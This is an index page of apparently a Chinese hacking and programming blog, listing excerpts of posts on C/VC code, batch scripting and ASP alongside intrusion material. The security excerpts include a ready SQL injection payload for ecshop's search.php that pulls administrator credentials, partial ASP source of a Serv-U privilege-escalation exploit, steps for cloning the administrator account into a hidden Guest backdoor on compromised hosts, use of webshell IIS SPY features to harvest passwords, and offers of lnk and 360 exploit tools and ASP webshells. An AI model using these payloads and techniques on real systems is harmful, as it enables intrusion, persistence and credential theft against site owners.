分类: |

VC实现PPPOE拨号

电信太黑暗,硬要我们用闪讯。。。唉,跟闪讯斗争了好久仍然没有成果。早知道就好好学学破解的东西。。。现在只能瞎搞,搞出一点是一点。而且现在又没在学校里,就算搞出点东西也不能知道是不是对。据我的观察,闪讯没有加壳,但是做了反调试,一有调试器运行它就跳出来说它不干了。今晚无聊,写了几个dll钩了几个函数,结果倒是发现了一些东西。。。闪讯用了一个名为Dial的函数来拨号,Dial(用户名,密码,*,1),这样一个函数来 拨号。只要勾住它就能截获闪讯产生的真实用户名和密码,用户名的最前面竟然加了一个"\n\n\r",后面还跟了一些不知道什么的数据,上次还以为用一个嗅探器嗅到了真实用户名,却怎么博也拨不上。可惜现在没有实践的机会。

另外我还发现闪讯拨号用的现成的api,ras函数。这也否定了我以前的一个猜想。我现在强烈感觉到那串加在用户名前面的不明数据就是一串随即数据。ras函数我不熟,网上找了一个简单的pppoe例子,先放着以后说不定用得着。

废话到此结束。

背景:代替手工自动进行PPPOE拨号

相关知识:

主要使用的函数:

The RasDial function establishes a RAS connection between a RAS client and a RAS server. The connection data includes callback and user-authentication information

DWORD RasDial(

__in LPRASDIALEXTENSIONS lpRasDialExtensions,

__in LPCTSTR lpszPhonebook,

__in LPRASDIALPARAMS lpRasDialParams,

__in DWORD dwNotifierType,

__in LPVOID lpvNotifier,

__in LPHRASCONN lphRasConn

);



Return Value

查看更多...

Tags: vc pppoe 拨号

分类:c/c++ | 固定链接 | 评论: 0 | 查看次数: 17971

md5 在线破解

NO.1
http://www.md5decrypter.co.uk/
很棒,据说数据量为130亿条,个人查询下来感觉不错,很多国内的收费数据在上面都可以免费查到。
xfyy888这个数据在国内三个网站上都是需要付费的,此站可以查询到。
注:这个站的验证码是区分大小写的,注意一下。

查看更多...

Tags: md5

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 10310

批处理高级教程

第一章 批处理基础
第一节 常用批处理内部命令简介
1、REM 和 ::
2、ECHO 和 @
3、PAUSE
4、ERRORLEVEL
5、TITLE
6、COLOR
7、mode 配置系统设备
8、GOTO 和 :
9、FIND
10、START
11、assoc 和 ftype
12、pushd 和 popd
13、CALL
14、shift
15、IF
16、setlocal 与 变量延迟
17、ATTRIB 显示或更改文件属性
第二节 常用特殊符号
1、@ 命令行回显屏蔽符
2、% 批处理变量引导符
3、> 重定向符
4、>> 重定向符
5、<、>&、<& 重定向符
6、| 命令管道符
7、^ 转义字符
8、& 组合命令
9、&& 组合命令
10、|| 组合命令 11、"" 字符串界定符
12、, 逗号
13、; 分号
14、() 括号
15、! 感叹号

查看更多...

Tags: 批处理

分类:下载专区 | 固定链接 | 评论: 0 | 查看次数: 8558

lnk漏洞利用工具



前言
windows的shell32在处理控制面板程序的快捷方式文件时,存在一个漏洞,可以加载硬盘上的任意DLL文件,即可执行任意代码。


漏洞文件的生成
到“控制面板”下面,右键点“显示”,点“创建快捷方式”,把快捷方式创建在桌面上。然后在桌面用WinHex打开“显示.lnk”文件。

查看更多...

Tags: lnk 漏洞 利用

分类:下载专区 | 固定链接 | 评论: 0 | 查看次数: 9214

账户克隆原理介绍

 


    相信大家都用过克隆帐户吧。无论是用工具还是用手工,克隆帐户无疑是隐藏帐户的最好选择。但是看见网上的文章都讲的特别麻烦。这样
那样的。其实克隆帐户很简单。就是复制administrator的注册表项。本篇文章针对已经使用过克隆的用户,不针对对克隆帐户一无所知者。
我只讲述下克隆的原理和方法。希望对大家有所启发。


原理:我们的帐户在注册表里都有他相应的键值,具体在 “[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users ”administrator 的
项为 “000001F4”下面有 2个二进制值 一个 是“F”一个是“V”。我一般克隆的都是 Guest用户,所以我就拿这个克隆这个用户做例子,
克隆其他用户方法相同。Guest的项为 “000001F5”。其他用户所对应的项可以从 “[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\
Users\Names”下查看。我们所要做的就是把“1F4”下的“F”和“V”值复制到“1F5”下的对应值里。这就是所说的克隆帐户。


1 简单克隆:
    a,原理:只复制“F”值。这样克隆出来的帐户隐蔽性比完全克隆(一会要说到)要低些,但是对自己方便些。如果肉鸡的管理员不是
太厉害的话,建议你用这个方法。这样克隆出来的用户如果登陆上去,所用的桌面了什么的都是administrator的,也就是说你在系统里的
文件“C:\Documents and Settings\Administrator”和admin是一样的。而非以前的“C:\Documents and Settings\Guest”。但是在
“query user”和“终端服务管理器”里面你所登陆的用户还是“Guest”,还有就是用命令“net localgroup administrators”还是可以
看出Guest是管理员来,这就是我所说的隐蔽性比完全克隆要低些。但是在net下,和用户管理中都看不出Guest用户有什么问题。

查看更多...

Tags: 账户 克隆

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8674

防止aspx木马的IIS SPY变态功能

如果服务器支持aspx语言,而且被上传了aspx木马,利用木马里面的IIS SPY 功能,可以读出IIS里面的所有用户的密码,包括用IIS做FTP的,也能读出所有用户的FTP的用户名和密码,真是太变态了。

下面讲一下如何防止木马使用iis spy 功能。

C:\WINDOWS\system32\activeds.tlb 找到此文件,取消users权限即可。

回收一下进程,再用木马自己测试一下,是否已经不能读取了? 提示"加载类型库/DLL 时出错"

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 10194

mylcx 穿墙版

写的很匆忙很乱,可能有些地方会有问题。

说一下用法吧

-slave 和-listen 两个参数同lcx就不多说了,或者参考我的另一偏文章

http://www.zeroplace.cn/article.asp?id=441

查看更多...

分类:socket编程 | 固定链接 | 评论: 0 | 查看次数: 10562

提权之iis spy利用

或许用过aspx大马的人知道一般aspx大马都有一个功能叫做"iis spy",它的作用就是列出服务器上面所有网站的信息,包括用户名,密码,路径以及捆绑的域名。

一般我们要是做旁注的时候只需要看目标网站在哪个路径下面然后尝试跳转过去或者cacls改下权限(我用的前一个服务器竟然就有这样的问题,直接cacls就可以修改权限,我自己给自己送了个webshell竟然还可以旁别人的,着实被恶心一下。)。

而且很多情况下,iis密码是乱码的,这我没有仔细研究过是不是随即产生的。但要是密码不是乱码的话你就要注意了,说不定这个密码和用户名就可以用来登陆ftp。不妨试下。上次一个shell把我深深地雷到了,管理员的密码竟然也这样暴露在阳光下。操到3389里登陆,提权都免了。

iis spy的作用主要就这两个了。

查看更多...

Tags: 提权 iis

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 10171

base64编码/解码函数 c语言

  1. /* base64编码函数 */

  2. int base64(char *s,char *d)
  3. {
  4. char CharSet[64]={
  5. 'A','B','C','D','E','F','G','H',
  6. 'I','J','K','L','M','N','O','P',
  7. 'Q','R','S','T','U','V','W','X',
  8. 'Y','Z','a','b','c','d','e','f',
  9. 'g','h','i','j','k','l','m','n',
  10. 'o','p','q','r','s','t','u','v',
  11. 'w','x','y','z','0','1','2','3',
  12. '4','5','6','7','8','9','+','/'};

查看更多...

分类:c/c++ | 固定链接 | 评论: 0 | 查看次数: 11073

Cr&#101;ateProcess实例和TerminateProcess实例

这个实例编写了两个函数,分别叫做shell和kill(用到的api分别是CreateProcess和,TerminateProcess).shell函数的参数是一个你要执行的可执行文件的名称,当然只要文文件格式符合exe的pe格式就可以(比如你可以把一个calc.exe改名为calc.jpg用这个函数照样可以执行),然后他返回新创建的这个进程的pid。

第二个函数的作用是结束一个进程,你只须传入这个进程的pid即可。若成功返回true, 否则返回false。

很简单吧。

#include <windows.h>

查看更多...

分类:c/c++ | 固定链接 | 评论: 0 | 查看次数: 20231

serv-u7,8,9本地提权exp

serv-u提权使用前提:管理员没有设置本地管理密码.如果设置了,可以在serv-u安装目录\Users\Local Administrator Domain\.Archive里面找到一个MD5值,是前两位随机字符+MD5.破出来后减去前两位随机字符就是本地管理密码.如果管理员没有设置,在exp的第一页随便填什么密码都可以进去.建立好域的时候要等半分钟才能登陆.不然会出现错误.

<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function

Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"
End If
end Function

Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
<%
    ''----------自定义参数开始-----------

查看更多...

Tags: 提权 本地

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8517

中转注入原理

呵呵,又来骗流量了。说起来真的是孤陋寡闻了,我听说中转注入这个方法大概是在几个月前,但这位寂寞的刺猬大侠好象在07年或者更早就弄出了这东西。刚听说中转注入的时候觉得很好奇,以为又出什么新招了,看了代码才知道原来所谓的中转注入其实就是传说当中的cookie注入。但cookie注入很烦琐,而且基本上只能用手工,所以我觉得这个中转注入的想法真的很巧妙,巧妙地把原来无法放阿D或者明小子上注的cookie中转到了url上面。

既然骗了人来这里看我写的这个无聊的文章,那我也稍微负点责好了,简单的说下原理。其实了解cookie注入的同学应该都明白的。

我不知道大家遇到cookie注入的时候是怎么注的,反正我是用的明小子里面带的浏览器,那个有个修改cookie的功能。然后再结合一下站长工具里面的一个escape加密工具就可以注入了。要是能直接暴出用户密码当然最好,要是暴不出真的就是一件非常烦琐的事情了。

比如有这么一个cookie注入点

查看更多...

Tags: 注入

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 17464

js实现无刷新更新数据

程序设计中会经常碰到一种情况,就是事先无法得知用户会需要哪些数据,必须根据用户选择后再从服务器重新提取数据后反馈给用户。比如一简单的情况,用户选择省份以后,我们立即会在市里边将这个省的所有市重新显示出来。这种
程序设计中会经常碰到一种情况,就是事先无法得知用户会需要哪些数据,必须根据用户选择后再从服务器重新提取数据后反馈给用户。比如一简单的情况,用户选择省份以后,我们立即会在市里边将这个省的所有市重新显示出来。这种情况一般需要将整个页面刷新后才可以重新读取,但这样不仅效率不高外,也显得不太优雅。其实用javascript结合微软件的XMLHTTP对象,我们可以不用刷新,“稍稍”的就可以将数据从服务器上读取出来,显得既专业,又高效。

  下面我们就以一个验证用户是否被注册的情况来演示这种技术。 

'程序设计:环球万维,专业域名注册,虚拟主机服务商 
'网址:http://www.netInter.cn
'此程序为环球万维原创程序,所以如果您需转载,请注明出处,谢谢。
'以上信息与文章正文是不可分割的一部分,所以如果您要转载本文章,您必须保留以上信息.

  1.首先在服务器上建立一个CheckUser.asp文件,用来检测用户是否存在,根据用户是否存在分别反馈0和1

u_name=Request.QueryString("u_name") 
if u_name 存在 then 
Response.write "0" 
else 
Response.write "1" 
end if

    2.客户端HTML设计:

一、JavaScript代码:

<script language=javascript> 
function check_user_exists(form){ 
u_name=form.u_name.value; 
if (u_name==null||u_name==''){ 
alert("请您输入用户名"); 
return false; 

infoBoard=document.getElementById("checkInfo"); 
infoBoard.innerText='查询中...'; 
myurl=location.protocol+"//"+location.hostname+"/CheckUser.asp?u_name="+u_name; 
retCode=openUrl(myurl); 
switch(retCode){ 
case "-2": 
infoBoard.innerHTML='<font color=red>抱歉</font>,查询失败';break; 
case "1": 
infoBoard.innerHTML='<font color=red>恭喜</font>,'+u_name+'可以使用';break; 
case "0": 
infoBoard.innerHTML='<font color=red>抱歉</font>,用户名'+u_name+'已经被使用'; 

return; 

function openurl(/url){ 
var objxml=new ActiveXObject("Microsoft.XMLHttp") 
objxml.open("GET",url,false); 
objxml.send(); 
retInfo=objxml.responseText; 
if (objxml.status=="200"){ 
return retInfo; 

else{ 
return "-2"; 


</script>


二、HTML表单设计:

<form name=form1 action="XXXX.asp" method="post"> 
<input type=text name=u_name><span id="checkInfo"></span><input type=button name=checkuser value="检测用户是否存在" onClick="check_user_exists(this.form);"> 
</form>


经过以上三步,一个不需要页面刷新的数据更新程序就完成了,按此方法,可以实现很多会很酷的应用:)

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 8912

360漏洞利用工具

360暴的那个漏洞已经很长时间了,但据我所知很多服务器其实并没有补上这个漏洞。原因是多方面的,可能是防火墙或者是设置,反正最终导致的是360漏洞没有被补上,至少也是很多机子都没有补上。废话不说了,献上漏洞利用工具一个。

原理什么的就不多说了,网上太多太多了。

说下用法把

usage:

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 17303

宽字符处理函数函数与普通函数对照表

只要看见“W”就是宽的意思,左边wchar_t,右边char


字符分类:
宽字符函数            普通C函数            描述
iswalnum()             isalnum()              测试字符是否为数字或字母
iswalpha()             isalpha()              测试字符是否是字母
iswcntrl()                iscntrl()                 测试字符是否是控制符
iswdigit()                isdigit()                测试字符是否为数字
iswgraph()             isgraph()              测试字符是否是可见字符
iswlower()              islower()              测试字符是否是小写字符
iswprint()               isprint()               测试字符是否是可打印字符
iswpunct()             ispunct()            测试字符是否是标点符号
iswspace()             isspace()             测试字符是否是空白符号
iswupper()             isupper()            测试字符是否是大写字符
iswxdigit()              isxdigit()              测试字符是否是十六进制的数字

大小写转换:
宽字符函数            普通C函数            描述
towlower()             tolower()            把字符转换为小写
towupper()            toupper()             把字符转换为大写

查看更多...

分类:c/c++ | 固定链接 | 评论: 0 | 查看次数: 8458

ecshop search.php的注入漏洞-爆出管理员密码!

 

利用语句:
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319pTXcopyd-code

解决方案
search.php
大概300 源
            if (is_not_null($val) )
修改为
            if (is_not_null($val) && is_numeric($key))

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 9260

asp大马

第一款:心动吧asp大马

asp大马asp大马asp大马asp大马asp大马

第二款:暗组新出的一个asp大马

asp大马asp大马asp大马asp大马

查看更多...

Tags: asp 大马 下载

分类:下载专区 | 固定链接 | 评论: 0 | 查看次数: 15644

ASP下载功能实现

 

将下边的文件保存为Download.asp就可以了,然后根据需要传要下载的文件过来就可以了。

  使用格式:Download.asp?FileName=要下载的文件名

  注意:FileName后边只能是要下载的文件名,文件所在的路径要在源代码里设置FilePath变量。当然这个变量也可以动态设置,方法两种:一、也是使用URL传递过来;二、从数据库中读去。至于如何设置,根据需要了。

 

 1 <%
 2 Dim Stream
 3 Dim Contents
 4 Dim FileName
 5 Dim FileExt
 6 Dim FilePath
 7 
 8 Rem 设置下载文件所在的路径,默认空,要下载的文件与当前文件在同一目录
 9 FilePath = ""
10 
11 Const adTypeBinary = 1
12 FileName = Request.QueryString("FileName")
13 if FileName = "" Then
14     Response.Write "无效文件名."
15     Response.End
16 End if
17 
18 Rem 下面是不希望下载的文件
19 FileExt = Mid(FileName, InStrRev(FileName, "."+ 1)
20 Select Case UCase(FileExt)
21     Case "ASP""ASA""ASPX""ASAX""MDB"
22         Response.Write "受保护文件,不能下载."
23         Response.End
24 End Select
25 
26 Rem 下载这个文件
27 Response.Clear
28 Response.ContentType = "application/octet-stream"
29 Response.AddHeader "content-disposition""attachment; filename=" & FileName
30 Set Stream = server.CreateObject("ADODB.Stream")
31 Stream.Type = adTypeBinary
32 Stream.Open
33 Stream.LoadFromFile Server.MapPath(FileName)
34 While Not Stream.EOS
35     Response.BinaryWrite Stream.Read(1024 * 64)
36 Wend
37 Stream.Close
38 Set Stream = Nothing
39 Response.Flush
40 Response.End
41 %>

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 9889

lcx不能转发ftp解决

 

 点击下载此文件

上次搞一个站的时候,用的FileZilla提权,当时挺郁闷的。用的lcx把FileZilla的端口发出来了,用户也加了,结果ftp搞死搞活愣是发不出来,想用别的工具转发一下,结果一时没搞到免杀的。当时用的是写了个bat直接在webshell上执行了,算是提权了。后来想想着下次可能会有类似的情况呢,于是写了这个东西。

我没看过lcx的源码~所以不知道为什么它不能转发ftp

查看更多...

Tags: lcx 端口 转发 mylcx

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 11443

win7 搜索功能失效

修复win7 搜索功能失效时的方法

下载附件,双击里面的reg文件即可

虽然可能会提示有部分数据导入失败,但是搜索功能已经恢复。

点击下载此文件

查看更多...

分类:win7技术 | 固定链接 | 评论: 0 | 查看次数: 9276